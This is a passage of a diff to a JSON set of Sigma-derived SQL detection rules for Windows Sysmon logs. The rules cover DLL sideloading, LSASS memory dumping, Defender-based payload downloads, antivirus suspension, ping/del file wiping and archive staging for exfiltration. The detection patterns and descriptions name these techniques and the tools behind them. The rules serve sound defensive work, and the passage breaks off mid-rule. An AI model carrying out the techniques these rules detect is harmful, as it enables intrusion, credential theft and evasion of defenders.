+ "title": "Detection of PowerShell Execution via Sqlps.exe", + "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. 
This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "description": "Detects a method often used by ransomware. 
Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", - "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of 
Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1562.001" ], "falsepositives": [ - "Rarely observed" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", + "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. 
the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image = ''))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_winzip_password_compression.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Parent in Public Folder Suspicious 
Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": 
"ec8c4047-fad9-416a-8c81-0f479353d7f6", - "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "title": "WebDav Client Execution", + "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "status": "test", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious svchost process start", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", + "title": "Suspicious 
aspnet_compiler.exe Execution", + "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "status": "test", + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1127" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" }, { - "title": "VMGuestLib DLL Sideload", - "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "status": "experimental", - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp", + "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "FP could occur if the legitimate version of vmGuestLib already exists on the system" + "Unknown" ], "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND Image LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "image_load_side_load_vmguestlib.yml" + "filename": "proc_creation_win_powershell_zip_compress.yml" }, { - "title": "Potential DLL Sideloading Using Coregen.exe", - "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", + "title": "Suspicious RunAs-Like Flag Combination", + "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", "status": "experimental", - "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", - "author": "frack113", + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. 
seen in PsExec-like tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1055" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_coregen.yml" + "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "File or 
Folder Permissions Modifications", + "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "status": "test", + "description": "Detects a file or folder's permissions being modified or tampered with.", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR Image LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_iviewers.yml" + 
"filename": "proc_creation_win_susp_file_permission_modifications.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Explorer Process Tree Break", + "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_explorer_break_process_tree.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "status": "experimental", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE 